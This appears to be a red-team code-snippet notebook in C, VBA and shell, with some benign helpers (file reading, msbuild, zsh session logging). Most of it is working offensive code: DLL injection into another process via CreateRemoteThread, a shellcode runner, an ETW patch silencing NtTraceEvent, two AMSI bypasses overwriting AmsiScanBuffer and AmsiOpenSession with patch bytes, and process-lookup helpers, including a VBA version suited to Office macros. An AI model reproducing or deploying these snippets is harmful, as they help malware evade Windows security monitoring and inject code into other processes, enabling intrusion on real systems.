Code snippets
Table of content
- C printf DEBUG macro
- Read a full file
- NtCurrentProcess
- Typedef NTDLL functions
- Inject DLL in process
- Run shellcode
- Patch ETW
- Patch AMSI
- Get process handle by name
- Build MS project from command line
- Auto timeline
C printf DEBUG macro
#define DEBUG(x, ...) printf(x, ##__VA_ARGS__)
Read a full file
void readFile(char* filename, char** string) {
FILE* f = fopen(filename, "rb");
if (!f) {
printf("Cannot open the file\n");
return;
}
fseek(f, 0, SEEK_END);
size_t fsize = ftell(f);
fseek(f, 0, SEEK_SET);
*string = (char*)malloc(fsize + 1);
if (!*string) {
printf("Cannot allocate string buffer");
return;
}
fread(*string, fsize, 1, f);
fclose(f);
(*string)[fsize] = 0;
}
NtCurrentProcess
#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
Typedef NTDLL functions
typedef NTSTATUS(NTAPI *pNtSetInformationProcess)(
HANDLE ProcessHandle,
PROCESS_INFORMATION_CLASS ProcessInformationClass,
PVOID ProcessInformation,
ULONG ProcessInformationLength
);
Inject DLL in process
#include <windows.h>
#include <stdio.h>
BOOL injectDLL(char *moduleToInject, DWORD processPID) {
// open the target process
HANDLE processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, processPID);
// allocate the memory page to inject the DLL path
void* remoteBuffer = VirtualAllocEx(processHandle, NULL, strlen(moduleToInject) * sizeof(char), MEM_COMMIT, PAGE_READWRITE);
if (!remoteBuffer) {
return FALSE;
}
// inject the dll name
BOOL status = WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)moduleToInject, strlen(moduleToInject) * sizeof(char), NULL);
if (!status) {
return FALSE;
}
// load the dll with LoadLibraryW
HMODULE kernel32 = GetModuleHandleA("Kernel32.dll");
if (!kernel32) {
return FALSE;
}
PTHREAD_START_ROUTINE threadRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(kernel32, "LoadLibraryA");
if (!threadRoutine) {
return FALSE;
}
HANDLE dllThread = CreateRemoteThread(processHandle, NULL, 0, threadRoutine, remoteBuffer, 0, NULL);
if (!dllThread) {
return FALSE;
}
WaitForSingleObject(dllThread, 1000);
return TRUE;
}
Run shellcode
((void(*)())entrypointAddress)();
Patch ETW
void patchETW(){
Pvoid NtTraceEvent = GetProcAddress(GetModuleHandle("ntdll.dll"), "NtTraceEvent");
DWORD dwOld;
DWORD retPatch = 0xc3;
VirtualProtect((DWORD64)NtTraceEvent + 3, 1, PAGE_EXECUTE_READWRITE, &dwOld);
CopyMemory((DWORD64)NtTraceEvent + 3, &retPatch, 1);
VirtualProtect((DWORD64)NtTraceEvent + 3, 1, dwOld, &dwOld);
}
Patch AMSI
void patchAMSI(OUT HANDLE& hProc) {
void* amsiAddr = GetProcAddress(LoadLibraryA("amsi.dll"), "AmsiScanBuffer");
char amsiPatch[] = { 0x31, 0xC0, 0x05, 0x4E, 0xFE, 0xFD, 0x7D, 0x05, 0x09, 0x02, 0x09, 0x02, 0xC3 };
DWORD lpflOldProtect = 0;
unsigned __int64 memPage = 0x1000;
void* amsiAddr_bk = amsiAddr;
NtProtectVirtualMemory(hProc, (PVOID*)&amsiAddr_bk, (PSIZE_T)&memPage, 0x04, &lpflOldProtect);
NtWriteVirtualMemory(hProc, (LPVOID)amsiAddr, (PVOID)amsiPatch, sizeof(amsiPatch), (SIZE_T*)nullptr);
NtProtectVirtualMemory(hProc, (PVOID*)&amsiAddr_bk, (PSIZE_T)&memPage, lpflOldProtect, &lpflOldProtect);
}
void patchAMSIOpenSession(OUT HANDLE& hProc) {
void* amsiAddr = GetProcAddress(LoadLibraryA("amsi.dll"), "AmsiOpenSession");
char amsiPatch[] = { 0x48, 0x31, 0xC0 };
DWORD lpflOldProtect = 0;
unsigned __int64 memPage = 0x1000;
void* amsiAddr_bk = amsiAddr;
NtProtectVirtualMemory(hProc, (PVOID*)&amsiAddr_bk, (PSIZE_T)&memPage, 0x04, &lpflOldProtect);
NtWriteVirtualMemory(hProc, (LPVOID)amsiAddr, (PVOID)amsiPatch, sizeof(amsiPatch), (SIZE_T*)nullptr);
NtProtectVirtualMemory(hProc, (PVOID*)&amsiAddr_bk, (PSIZE_T)&memPage, lpflOldProtect, &lpflOldProtect);
}
Get process handle by name
C
#include <TlHelp32.h>
HANDLE getProcHandlebyName(LPCWCHAR procName, DWORD* PID) {
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
NTSTATUS status = NULL;
HANDLE hProc = 0;
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
if (Process32First(snapshot, &entry)) {
do {
if (wcscmp((entry.szExeFile), procName) == 0) {
*PID = entry.th32ProcessID;
HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, *PID);
if (!hProc) {
continue;
}
return hProc;
}
} while (Process32Next(snapshot, &entry));
}
return NULL;
}
VBA
Private Declare PtrSafe Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare PtrSafe Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, PE32 As PROCESSENTRY32) As Long
Private Declare PtrSafe Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, PE32 As PROCESSENTRY32) As Long
Private Function PIDByProcName(ProcName As String) As Integer
Dim PE32 As PROCESSENTRY32
Dim Proc_Name As String
Dim hSnapshot As Long
Dim lRet As Long
Dim PID As Integer
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&)
If hSnapshot <> INVALID_HANDLE_VALUE Then
PE32.dwSize = Len(PE32)
lRet = Process32First(hSnapshot, PE32)
Do While lRet
Dim comp As Integer
comp = InStr(1, PE32.szExeFile, ProcName, vbBinaryCompare)
If comp > 0 Then
PIDByProcName = PE32.th32ProcessID
Exit Function
End If
lRet = Process32Next(hSnapshot, PE32)
Loop
CloseHandle hSnapshot
End If
End Function
Build MS project from command line
msbuild -p:Configuration=Release -t:Clean,Build
Auto timeline
Add in the .zshrc
preexec() { echo ">> Date : `date +%d.%m.%y-%H:%M:%S`\n"; }
Add in the .zshenv
if [[ ${SHLVL} -eq 1 ]]; then
script ~/.script/`date +%d.%m.%y-%H:%M:%S`-`echo $((1 + $RANDOM % 1000))`
fi